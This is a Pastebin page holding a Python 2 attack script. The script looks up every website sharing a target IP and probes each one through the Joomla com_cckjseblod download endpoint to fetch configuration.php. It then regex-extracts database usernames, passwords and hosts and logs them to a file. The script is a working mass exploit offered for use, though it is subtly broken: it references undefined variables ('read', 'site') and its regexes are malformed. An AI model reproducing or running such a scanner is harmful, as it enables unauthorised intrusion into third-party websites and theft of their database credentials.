Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import urllib,urllib2,os,sys,re
- import json
- import urlparse
- filename = sys.argv[0].split('\\')[-1] if os.name == 'nt' else sys.argv[0].split('/')[-1]
- def usage() :
- print ' Coded By Thex@b1 (Usage : %s < ip | hostname | url >)' % filename
- def getdata(remoteaddr) :
- try :
- url = 'http://domains.yougetsignal.com/domains.php'
- req = urllib2.Request(url)
- req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0')
- req.add_header('X-Requested-With','XMLHttpRequest')
- req.add_header('X-Prototype-Version','1.6.0')
- req.add_header('Referer','http://www.yougetsignal.com/tools/web-sites-on-web-server/')
- req.add_header('Origin','http://www.yougetsignal.com')
- params = {"Key":"","remoteAddress": remoteaddr}
- query = urllib.urlencode(params)
- resp = urllib2.urlopen(req, query)
- result = resp.read()
- data = json.loads(result)
- return data
- except Exception as exp :
- print exp
- sys.exit(0)
- def getdomains(data) :
- try :
- if data['status'] == 'Success' :
- domains = []
- for domain,info in data['domainArray'] :
- domains.append(domain)
- return domains
- elif data['status'] == 'Fail' :
- return []
- else :
- return []
- except Exception as ex :
- print ex
- sys.exit(0)
- def main() :
- if len(sys.argv) != 2 :
- usage()
- sys.exit(0)
- ip = sys.argv[1]
- if ip.startswith('http://') or ip.startswith('https://') :
- parsedurl = urlparse.urlparse(ip)
- ip = parsedurl.hostname
- data = getdata(ip)
- if data['status'] == 'Fail' :
- print '[-] '+data['message']
- sys.exit(0)
- for url in getdomains(data) :
- try:
- uop = urllib2.urlopen('http://'+url+'/index.php?option=com_cckjseblod&task=download&file=configuration.php').read()
- print 'testing'+ url
- if "JConfig" in uop:
- print "[+][vuln] ==========>"+url+"/index.php?option=com_cckjseblod&task=download&file=configuration.php"
- user = re.search("\('$user',*'(.*?)' *\)",uop).group(1)
- print '[+] DB_user' +user
- pwd = re.search("\('$password', *'(.*?)' *\)",read).group(1)
- print '[+] DB_PASSWORD :'+pwd
- host = re.search("\('$db', *'(.*?)' *\)",read).group(1)
- print '[+] DB_HOST :'+host
- w = open('joomla.txt','a')
- w.write("http://"+site+"\nDB_USER:"+user+"\nDB_PASSWORD :"+pwd+"\nDB_HOST :"+host+"\n")
- else :
- print "not vuln"
- except Exception as ex:
- print url+" not vuln"
- if __name__ == '__main__' : main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement